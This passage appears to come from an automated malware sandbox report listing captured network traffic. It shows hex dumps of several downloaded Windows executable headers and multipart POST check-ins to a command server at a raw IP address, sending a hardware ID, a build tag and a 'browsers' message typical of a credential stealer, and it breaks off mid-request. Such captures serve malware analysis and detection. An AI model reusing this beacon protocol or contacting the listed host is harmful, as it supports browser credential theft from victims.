00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 06:34:29 GMTContent-Type: application/octet-streamContent-Length: 1928192Last-Modified: Thu, 05 Dec 2024 05:58:50 GMTConnection: keep-aliveETag: "6751411a-1d6c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 39 d6 7e 68 7d b7 10 3b 7d b7 10 3b 7d b7 10 3b 63 e5 94 3b 61 b7 10 3b 63 e5 85 3b 69 b7 10 3b 63 e5 93 3b 25 b7 10 3b 5a 71 6b 3b 78 b7 10 3b 7d b7 11 3b 12 b7 10 3b 63 e5 9a 3b 7c b7 10 3b 63 e5 84 3b 7c b7 10 3b 63 e5 81 3b 7c b7 10 3b 52 69 63 68 7d b7 10 3b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d5 36 5f 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 a6 01 00 00 00 00 00 00 90 85 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 85 00 00 04 00 00 aa fb 1d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 00 42 00 6e 00 00 00 00 e0 40 00 a0 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 c6 84 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a0 16 01 00 00 e0 40 00 00 78 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 42 00 00 02 00 00 00 dc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 29 00 00 10 42 00 00 02 00 00 00 de 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6d 66 62 74 78 6e 62 00 70 1a 00 00 10 6b 00 00 66 1a 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 62 6e 6b 62 64 77 78 00 10 00 00 00 80 85 00 00 04 00 00 00 46 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 85 00 00 22 00 00 00 4a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 06:34:37 GMTContent-Type: application/octet-streamContent-Length: 1809408Last-Modified: Thu, 05 Dec 2024 06:18:18 GMTConnection: keep-aliveETag: "675145aa-1b9c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 10 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 48 00 00 04 00 00 9f 05 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 32 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 02 00 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 44 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 40 05 00 00 02 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 61 64 6e 6f 6a 64 68 00 30 19 00 00 d0 2e 00 00 2e 19 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 62 77 7a 69 6b 74 63 00 10 00 00 00 00 48 00 00 04 00 00 00 76 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 48 00 00 22 00 00 00 7a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 06:34:47 GMTContent-Type: application/octet-streamContent-Length: 1823744Last-Modified: Thu, 05 Dec 2024 06:18:25 GMTConnection: keep-aliveETag: "675145b1-1bd400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce b4 e2 38 8a d5 8c 6b 8a d5 8c 6b 8a d5 8c 6b e5 a3 27 6b 92 d5 8c 6b e5 a3 12 6b 87 d5 8c 6b e5 a3 26 6b b0 d5 8c 6b 83 ad 0f 6b 89 d5 8c 6b 83 ad 1f 6b 88 d5 8c 6b 0a ac 8d 6a 89 d5 8c 6b 8a d5 8d 6b d6 d5 8c 6b e5 a3 23 6b 98 d5 8c 6b e5 a3 11 6b 8b d5 8c 6b 52 69 63 68 8a d5 8c 6b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 3c e7 4a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 98 02 00 00 22 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 93 d4 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 73 77 64 76 79 78 6a 00 40 1a 00 00 20 4f 00 00 36 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 66 6a 67 6a 7a 77 65 00 10 00 00 00 60 69 00 00 04 00 00 00 ae 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 b2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 06:34:56 GMTContent-Type: application/octet-streamContent-Length: 971776Last-Modified: Thu, 05 Dec 2024 06:16:32 GMTConnection: keep-aliveETag: "67514540-ed400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 38 45 51 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 24 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 f2 2d 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 8c 69 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 8c 69 01 00 00 40 0d 00 00 6a 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 06:35:04 GMTContent-Type: application/octet-streamContent-Length: 2871808Last-Modified: Thu, 05 Dec 2024 06:16:58 GMTConnection: keep-aliveETag: "6751455a-2bd200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2c 00 00 04 00 00 bf 0c 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 78 75 66 65 70 71 6e 00 80 2b 00 00 a0 00 00 00 72 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6b 74 7a 64 6b 78 71 00 20 00 00 00 20 2c 00 00 04 00 00 00 ac 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2c 00 00 22 00 00 00 b0 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 06:35:14 GMTContent-Type: application/octet-streamContent-Length: 4480000Last-Modified: Thu, 05 Dec 2024 05:10:14 GMTConnection: keep-aliveETag: "675135b6-445c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 70 9d 4d 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 a4 4b 00 00 6c 7a 00 00 32 00 00 00 00 cd 00 00 10 00 00 00 c0 4b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 cd 00 00 04 00 00 fd a0 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f e0 77 00 73 00 00 00 00 d0 77 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 ed cc 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 ec cc 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 77 00 00 10 00 00 00 40 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 d0 77 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 77 00 00 02 00 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 39 00 00 f0 77 00 00 02 00 00 00 54 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 64 76 73 63 69 76 6f 00 e0 1b 00 00 10 b1 00 00 e0 1b 00 00 56 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 67 72 78 70 63 6c 68 00 10 00 00 00 f0 cc 00 00 04 00 00 00 36 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 cd 00 00 22 00 00 00 3a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 39 41 39 41 43 42 37 32 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="hwid"AA9A9ACB72684217651120------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="build"drum------BKECFIIEHCFHIECAFBAK--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDHIIJKEBGHJJKFIDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 48 49 49 4a 4b 45 42 47 48 4a 4a 4b 46 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 48 49 49 4a 4b 45 42 47 48 4a 4a 4b 46 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 48 49 49 4a 4b 45 42 47 48 4a 4a 4b 46 49 44 41 2d 2d 0d 0a Data Ascii: ------CGIDHIIJKEBGHJJKFIDAContent-Disposition: form-data; name="token"a4af3fc949833b4347557f25abaf0ea8349d2d7ba15bb03cdf9128c01bfdc9a9a24d7875------CGIDHIIJKEBGHJJKFIDAContent-Disposition: form-data; name="message"browsers------CGIDHIIJKEBGHJJKFIDA--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 61 66 33 66 63 39 34 39 38 33 33 62 34 33 34 37 35 35 37 66 32 35 61 62 61 66 30 65 61 38 33 34 39 64 32 64 37 62 61 31 35 62 62 30 33 63 64 66 39 31 32 38 63 30 31 62 66 64 63 39 61 39 61 32 34 64 37 38 37 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 